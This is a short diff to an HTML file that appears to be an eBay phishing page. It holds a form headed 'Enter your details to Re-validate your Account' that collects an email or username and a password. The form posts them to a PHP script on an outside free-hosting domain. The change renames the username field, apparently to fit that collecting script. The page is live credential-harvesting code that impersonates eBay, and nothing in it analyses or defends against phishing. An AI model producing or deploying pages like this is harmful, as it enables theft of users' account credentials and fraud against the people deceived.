--- a/ebat.html
+++ b/ebat.html
@@ -19,7 +19,7 @@
 <h3> Enter your details to Re-validate your Account </h3
 ><div>
 <form  action="https://mooreinsert.000webhostapp.com/ebay.php" method="post">
-<div><br /><div class=textbox><label for=userid class=floating-label__label>Email or username</label><input id=userid class="textbox__control textbox__control--fluid textbox__control--underline" type=text value name=userid maxlength=64 autocomplete=username></input>
+<div><br /><div class=textbox><label for=userid class=floating-label__label>Email or username</label><input id=userid class="textbox__control textbox__control--fluid textbox__control--underline" type=text  name=user maxlength=64 autocomplete=username></input>
 <div>
 <p><br /><div class=textbox><label  class=floating-label__label>Password</label><input id=userid class="textbox__control textbox__control--fluid textbox__control--underline" type=password  name=passwd maxlength=64 autocomplete=username></input>
 </p>
